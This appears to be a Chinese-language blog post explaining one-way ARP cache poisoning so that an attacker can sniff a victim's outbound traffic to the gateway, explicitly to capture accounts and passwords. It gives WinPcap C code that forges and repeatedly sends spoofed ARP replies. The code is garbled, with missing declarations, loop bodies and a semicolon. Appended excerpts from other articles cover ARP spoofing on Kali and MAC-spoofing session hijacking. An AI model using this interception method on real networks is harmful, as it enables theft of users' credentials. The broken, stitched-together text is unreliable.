再談利用arp欺騙實現嗅探
設有主機a、b、c在同乙個區域網中,且閘道器為g。a,c為要監聽的主機,b為我們的機器。目前的大多數工具的實現是欺騙a和與a通訊的主機c對方的mac均為b,這樣就可以監聽它們的通訊。但是實際上大多數情況下,我們感興趣的是a與閘道器g的通訊,而其中又尤其對a發出的一些資訊感興趣,譬如賬號、密碼,至於g又向a傳送了什麼資料,我們不太關心。
那麼在這種情況下,就沒有必要欺騙閘道器g(告訴g,a的mac為b)。只欺騙a主機,告訴它閘道器g的mac為b。這樣a,g之間的通訊就成了這個樣子:
a------->b------>g
a<----------------g
很明顯,若a收發的資料相當,那麼經過b的資料量幾乎少了一半,當然也就節省了網路頻寬和b主機的負擔。
下面給出在xp+vc6.0平台且被欺騙主機也為xp時用winpcap實現的**(本機需開ip路由功能):
#include
#include
#pragma comment(lib,"wpcap")
int main(int argc, char **argv)
/* print the list */
for(d=alldevs; d; d=d->next)
if(i==0)
printf("enter the inte***ce number (1-%d):",i);
scanf("%d", &inum);
if(inum < 1 || inum > i)
/* jump to the selected adapter */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* open the output adapter */
if((fp = pcap_open_live(d->name, 60, 1, 1000, error) ) == null)
pcap_freealldevs(alldevs);
/* mac of target you want to spoof */
packet[0]=0x00;
packet[1]=0x00;
packet[2]=0x00;
packet[3]=0x00;
packet[4]=0x00;
packet[5]=0x00;
/* mac of your host */
packet[6]=0x00;
packet[7]=0x00;
packet[8]=0x00;
packet[9]=0x00;
packet[10]=0x00;
packet[11]=0x00;
/* set the protocol type */
packet[12]=8;
packet[13]=6;
/* set the hard and protocol type */
packet[14]=0;
packet[15]=1;
packet[16]=8;
packet[17]=0;
/* set the length */
packet[18]=6;
packet[19]=4;
/* set the operation type */
packet[20]=0;
packet[21]=2;
/* mac of your host */
packet[22]=0x00;
packet[23]=0x00;
packet[24]=0x00;
packet[25]=0x00;
packet[26]=0x00;
packet[27]=0x00;
/* ip of the gateway */
packet[28]=0;
packet[29]=0;
packet[30]=0;
packet[31]=0;
/* mac of the target you want to spoof */
packet[32]=0x00;
packet[33]=0x00;
packet[34]=0x00;
packet[35]=0x00;
packet[36]=0x00;
packet[37]=0x00;
/* ip of the target you want to spoof */
packet[38]=0
packet[39]=0;
packet[40]=0;
packet[41]=0;
/* fill the rest of the packet */
for(i=42;i<60;i++)
/* send down the packet */
while(1)
return 0;}附:
對於怎樣實現arp欺騙,很可能不同的網路沒有一定的法則可循。我用的是xpsp1專業版,對於arp reply若傳送端不是閘道器則ip不更新arp快取,而該程式正好是閘道器的ip。
嗅探 欺騙 ARP欺騙
二 kali上實現arp欺騙 三 防範arp欺騙 arp欺騙 arp spoofing 又稱arp毒化或arp攻擊。它是針對乙太網位址解析協議 arp 的一種攻擊技術。通過欺 域網內訪問者的閘道器mac位址,使訪問者錯以為攻擊者更改後的mac位址是閘道器的mac,導致應當發往閘道器地資料報傳送到攻擊...
無ARP欺騙嗅探技術
文 圖 劉志生 arp欺騙的攻擊和防禦技術都比較成熟了,雜誌以前的文章也介紹得比較詳細,這裡就不再細述了。本文重點講解如何不使用arp欺騙進行嗅探以及會話劫持的技術原理,實際的攻擊方法是進行mac欺騙。原理說明 在開始之前,我們先簡單了解一下 交換機的 過程。交換機的乙個埠接收到乙個資料幀時,首先檢...
無ARP欺騙的嗅探技術
arp欺騙的攻擊和防禦技術都比較成熟了,這裡也不再闡述。此次重點講解如何不用arp欺騙進行嗅探以及會話劫持的技術原理,實際的攻擊方法是進行mac欺騙。一 原理 在開始之前我們先簡單了解一下交換機 過程 交換機的乙個埠收到乙個資料幀時,首先檢查改資料幀的目的mac位址在mac位址表 cam 對應的埠,...